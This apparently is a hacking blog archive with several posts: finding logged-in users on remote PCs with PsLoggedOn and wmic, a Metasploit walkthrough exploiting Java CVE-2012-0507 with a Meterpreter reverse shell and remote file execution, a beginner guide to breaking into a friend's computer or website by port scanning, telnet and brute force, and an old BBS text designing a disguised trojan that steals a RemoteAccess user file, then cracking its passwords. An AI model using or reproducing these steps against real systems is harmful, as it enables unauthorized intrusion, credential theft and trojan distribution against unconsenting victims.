Showing posts with label Remote Computer. Show all posts
Showing posts with label Remote Computer. Show all posts

Monday, 8 October 2012

How To Get User Name and Password (Remote Pc With IP))

     After you get the IP addresses of some computers on my network. You can use command line tool like PsExec, PsLogged which can take the IP Address as input and find out the username of the currently logged in user. Here that one of that tool, PsLoggedOn.

     You can determine who is using resources on your local computer with the "net" command ("net session"), however, there is no built-in way to determine who is using the resources of a remote computer. In addition, NT comes with no tools to see who is logged onto a computer, either locally or remotely. PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer, or a remote one. If you specify a user name instead of a computer, PsLoggedOn searches the computers in the network neighborhood and tells you if the user is currently logged on.
     PsLoggedOn's definition of a locally logged on user is one that has their profile loaded into the Registry, so PsLoggedOn determines who is logged on by scanning the keys under the HKEY_USERS key. For each key that has a name that is a user SID (security Identifier), PsLoggedOn looks up the corresponding user name and displays it. To determine who is logged onto a computer via resource shares, PsLoggedOn uses the NetSessionEnum API. Note that PsLoggedOn will show you as logged on via resource share to remote computers that you query because a logon is required for PsLoggedOn to access the Registry of a remote system.

You can use command below

wmic.exe /node:IP-or-HostName ComputerSystem Get UserName
 
Example 
 
wmic.exe /node:172.28.1.100 ComputerSystem Get UserName 

Ouput :
UserName
DOMAIN\User
 
Download PsLoggedOn
 

How To Remote Computer Using Metasploit

Whenever someone say PenTesting tool, the first thing come in our mind is MetaSploit . Today, i am going to demonstrate how to use the Metasploit tool to exploit the popular java AtomicReferenceArray Type Violation vulnerability(CVE-2012-0507).

    About MetaSploit:
    Metsploit is a very Powerful PenTesting Tool . Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Very useful tool for Information Gathering, Vulnerability Scanning, Exploit Development, Client side exploits,...

Mastering the Framework: A free course from Offensive-Security
The Offensive Security Team along with several active community members, made a free course on the Metasploit Framework "Mastering the Framework". The course covers Information gathering, Social engineering attacks, exploit development, Advance AV avoidance and etc...

The course is available here:
www.offensive-security.com/metasploit-unleashed/Introduction

    Donate to HFC, Feed a Child!
    The "Mastering the Framework" is free course. If you enjoyed the course, please donate to Hackers for Charity(HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is directly sent Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

    You can find further details about the donation here:
    http://www.offensive-security.com/metasploit-unleashed/Donate


Hey, where are you going?! Wait a Sec, take that course Once i demonstrate how to use the metasploit. Because, It will be hard to understand or boring, if you read those things directly.

Requirements:

    VirtualBox
    Target OS(windows,...)
    PenTesting Distro(Backtrack )
    JRE 6(unpatched version)


CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

    Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than 600,000 Mac computers by exploiting this vulnerability. Recently, The INSS , The Amnesty International UK websites injected with malicious code that exploit the CVE-2012-0507.

I am going to demonstrate this vulnerability with VirtualBox.  I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM?, read this: setup PenTesting Lab).

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate".  This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

    slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
    Download the java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

    Then, Download CVE-2012-0507.jar and paste in this folder "/opt/metasploit/msf3/data/exploits/"


Part III :
Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:


Step 1:
Open the Terminal and type "msfconsole".  This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.


Now type "show options" to display the which settings are available and/or required for this specific module.



Now type "set SRVPORT 80".
and  "set URIPATH /".



Step 3: Set Payload
Type "show payloads", this will displays the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.


set LHOST [IP_address] :  In order to get reverse connection, we have to set our IP in the LHOST.

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine.  The IP will be "192.168.56.x".   For instance, let me say the ip is 192.168.56.10.

Now  Type in the msfconsole as "set LHOST 192.168.56.10".



Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine.
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine, it will display the following output:


Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.



Step 4:Upload files
Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.



For Example, Typing 'sysinfo' will display the system information.


You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.


Security Tips:
Update your JRE to the latest version.


conclusion:
I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability.  I hope this will help you to get into the PenTesting world..!

Saturday, 6 October 2012

How To Remote Computer Using IP address


Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.

You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.

Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.

Well, both of the hacking has the same process. Let’s summarize what we must do.

    Confirm the website or a computer you want to hack.
    Find or trace their IP address.
    Make sure that IP address is online
    Scan for open ports
    Check for venerable ports
    access through the port
    Brute-force username and password

Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.

For example,
ping www.google.com

will fetch the IP address of Google.com

a How to hack remote computer using IP Address

This is how we can get the IP address of the victims website.

How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.

One of the widely used method to detect IP address of your friend is by chatting with him.

You might find this article helpful

    How to get the IP address using MSN/Yahoo/Pidgin messenger

Now you got the IP address right? Is it online?

To know the online status just ping the IP address, if it is online it will reply.

If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.

Use Advanced Port Scanner to scan all open and venerable ports.
b How to hack remote computer using IP Address

Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.

Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.

telnet [IP address] [Port]
c How to hack remote computer using IP Address

You’ll be asked to input login information.
d How to hack remote computer using IP Address

If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one.

In this way you’ll able to hack remove computer using only IP address

Related news:

    Changing your IP Adress
    Search the profile/people using their Email Address
    Get the larger image from Gravatar image icon
    How to get the IP address using MSN/Yahoo/Pidgin messenger
    Hacking and crashing website using IP

Thursday, 4 October 2012

(The REAL way to hack RemoteAccess)

             Well dewdz, ya seen the file text about hacking RemoteAccess and you wanna
crack that H/P or warez RA board for mega ratios?  Get Real!
Create a Social Network!


RA *CAN* be hacked but only in the same way as any other BBS sox...  no
sysop reading that file was shat themselves .. here's why not:

Basically the technique outlined involved you writing a trojan and
disguising it as some program the sysop is really gagging for in the hope
is he'll run it on his system.  Wot it'll really do is copy his USER.BBS
onto the filebase so you can call back later and d/l it... neat idea, and
one that in *theory* will work with most BBS sox (most are EVEN easier coz
they don't encrypt the users file like RA) but their execution of it sucks!

Firstly, their compiled batch file relied on the sysop running RA off their
C: drive from the directory \RA...  Yeah, maybe some lame PD board they
hang out on is like that but most sysops I know run multiple drives and
many have more complex directory structures...       Lame Hacker 0 - Sysop 1

Okay... letz assume they got on some lame fucking board and the users file
*is* C:\RA\USERS.BBS - next step is to copy the file into the filebase and
make it d/lable.  How do they do that? (patronising Dez Lymon voice) <g>.

Their idea was to copy the file into D:\FILES\UPLOAD ..  Yeah sure guyz...
EVERY board uses the D: drive for the filebase and happen to have a file
area in \FILES\UPLOAD - NOT!!!!!!                    Lame Hacker 0 - Sysop 2

Right, so they got better odds than winning the national fucking lottery and
all the above worked (yeah man, we're dreamin' but let's give 'em a chance).
What next?  The file has to be d/lable...  you found a sysop that makes
UNCHECKED & UNSCANNED files available for download?  Fuck off!  Get a life!
                                                     Lame Hacker 0 - Sysop 3

So...  okay....  we got a sysop that's so fucking lame he doesn't deserve
to to breath the same air as the rest of the human race and uses all the
above paths and makes unchecked uploads d/lable.  RA by default won't allow
files to be d/led UNLESS they're in the file database.  Unless the USERS.BBS
destination ALREADY EXISTED in that area and was previously in the area
database there's NO WAY you can d/l it.

The way they "solved" this was to add an entry to FILES.BBS in the file
directory.  Nice one... EXCEPT RA DOESN'T USE FILES.BBS AS IT'S FILE
DATABASE.   Unless you happen to be lucky enough that the sysop does an
import from FILES.BBS to the REAL file database before checking out your
planted file (most RA sysops only import from FILES.BBS when adding CDROMs)
the addition of this entry will do FUCK ALL!         Lame Hacker 0 - Sysop 4
                                                     
To quote from the author "This is a generic program and you will have to
tailor it so it will meet your needs." - yeah man, fucking rethink, redesign
and rewrite it more like!

Oh yeah... EVEN IF YOU DO get a copy of the USER.BBS file downloaded THE
PASSWORDS ARE ENCRYPTED!!!                       Lame Hacker :(  -  Sysop:-)


So how can U hack RA?  Well, the idea was okay but, like hacking any system,
you gotta KNOW the system ya gonna hack b4 U stand a chance.

Most sysops will use the DOS environment variable RA set to the RA system
directory so that external doors can find the system files...  that's very
helpful of the sysop, to show us where we can find his config files. <g>

In the RA system directory should be the file CONFIG.RA.  You might want to
include a check for this file within your program and possibly do a disk
and directory scan for the file if RA isn't defined or is set incorrectly.

I'm not *entirely* sure about other versions of RA, but in the current
release (2.02) the CONFIG.RA offset &h3E4 is where the name of the mail
directory starts.  This is the path where USERS.BBS will be found.

Next you need to know for SURE the name of a directory which stores the
files for a filearea from which you are able to download.

I suggest you do this in one of three ways:

1)  Interogate the file FILES.RA in the RA system directory which contains
    the filebase area configs.  You *could* just search the directory for a
    valid path but you'd wouldn't know if you had d/l access to the area. 

2)  If you want to be a bit more clever you could interpret the file and
    find out the minimum security level required to d/l from each area and
    dump your copy of USERS.BBS in the area with the lowest access level,
    pretty much guaranteeing that you'll be able to get to the file.  This
    doesn't take security flags into account so there's still a SLIM
    possiblity you won't be able to d/l the file unless you also write flag
    testing into your program.

3)  My favourite technique is to have the program read a small config file
    which is uploaded with your archive.  This file just contains the name
    of a file you KNOW you have d/l access from.  You can then either do a
    global search for that filename or, preferably (coz it's faster) read
    FILES.RA for the paths used by the filebase and search those.

So now you have the location of the USERS.BBS and the destination directory
you simply need to copy the file.  However, even though the file is sitting
in a filebase directory it STILL isn't available for d/l... why?  Because
it's not in the filearea database.

You could get clever and find amend filearea database files directly if you
get the fileareas path from CONFIG.RA (offset &hC12) and write to the files
HDR\FBD#####.HDR (header) IDX\FDB#####.IDX (index) and, if you want to add
a description, TXT\FBD#####.TXT, where ##### is the RA file area number.

There *is* an easier way.  Shell out to DOS and execute the RAFILE utility
from the RA program path, passing the arguments "ADOPT filename #####".

E.g. the BASIC command would be:

             SHELL "RAFILE ADOPT "+filename$+STR$(areanum)

Where filename$ contains the name of your USERS.BBS copy and areanum is the
RA filearea number.  If your filename was USERTEST.ZIP and you'd copied it
to the directory used for RA file area 10 you'd be executing:

             RAFILE ADOPT USERTEST.ZIP 10

This will "adopt" the file, adding it to the RA file database, making it
available for d/l (assuming you have the appropriate rights to the area).

All you need to do now is to package this trojan file to entice the sysop
into running it...  In the LAME method for hacking RA the author used DSZ
as an example.  That was about the most realistic part of the file and the
only bit worth leaching!  <g>


Your archive:
                DSZ.EXE (your program)
                DSZ.DAT (the *real* DSZ.EXE)
                DSZ.CFG (small file containing the name of a *known*
                         d/lable file - preferabbly encrypted)
                + any other files that normally come with DSZ


               
Flow diagram for DSZ.EXE trojan:

                            _______ 
                           /       \
                          |  Start  |
                           \_______/
                               |
                               |
                      +--------+--------+
                      | Read enviroment |
                      |   variable RA   |
                      +--------+--------+
                               |
                               |
                              / \
                            /     \
                          /CONFIG.RA\          +---------------------+
                        /  exist in   \___>____| Scan drives & paths |
                        \  that path  / No     | search for the file |
                          \    ?    /          +----------+----------+
                            \     /                       |
                              \ /                         |
                           Yes |                          |
                               +------------<-------------+
                               |
                      +--------+--------+
                      | Read CONFIG.RA  |
                      | to get location |
                      |   of USERS.BBS  |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Read DSZ.CFG to |
                      | get a filename  |
                      +--------+--------+
                               |_____________<____________
                               |                          |
                      +--------+--------+                 |
                      | Read FILES.RA to|                 |
                      | get name of the |                 |
                      |  next filearea  |                 |
                      +--------+--------+                 |
                               |                          |
                               |                          |
                              / \                         |
                            /     \                       |
                          /does area\                     |
                        / contain the \________>__________|
                        \     file    / No
                          \    ?    /
                            \     /                      
                              \ /                        
                           Yes |                         
                               |
                      +--------+--------+
                      | Copy USERS.BBS  |
                      | to the filearea |
                      |    directory    |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Run RAFILE with |
                      | ADOPT to update |
                      |   RA database   |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Delete DSZ.EXE  |
                      |   and DSZ.CFG   |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Rename DSZ.DAT  |
                      |   to DSZ.EXE    |
                      +--------+--------+
                               |
                            ___|___ 
                           /       \
                          |  Stop!  |
                           \_______/
                             
Once you've uploaded the file, preferably using a pseudonym, post the sysop
a message telling him how c00l your upload is.  Wait a day or so and dial
back.  Do a filename search using the name you decided to use for your copy
of USERS.BBS and d/l it. 

The next step, now you have the USERS.BBS file is to crack the passwords. 
I only know of ONE crack program out there which has the RA password
encryption algorythm, a program based on the popular Unix CRACKERJACK
program called RA-CRACK.  This simply takes a given word, encrypts it, and
compares it to the USERS.BBS file to find a user with a matching password.

RA-CRACK takes it's source words from a text file so it would be possible
to either:

 a)  Use a TXT dictionary file as the source.  All passwords that are
     normal words will be found.  This method will usually find about 90%
     of the user passwords.

 b)  Write a "brute force" cracker using a small routine that "counts"
     through valid ASCII character combinations from "!" (ASCII 33) upto
     a string containing 25 (max length of a RA password) null characters
     (ASCII 255), passing these via a text file to RA-CRACK.  This SHOULD
     be _100%_ successful, but SLOW!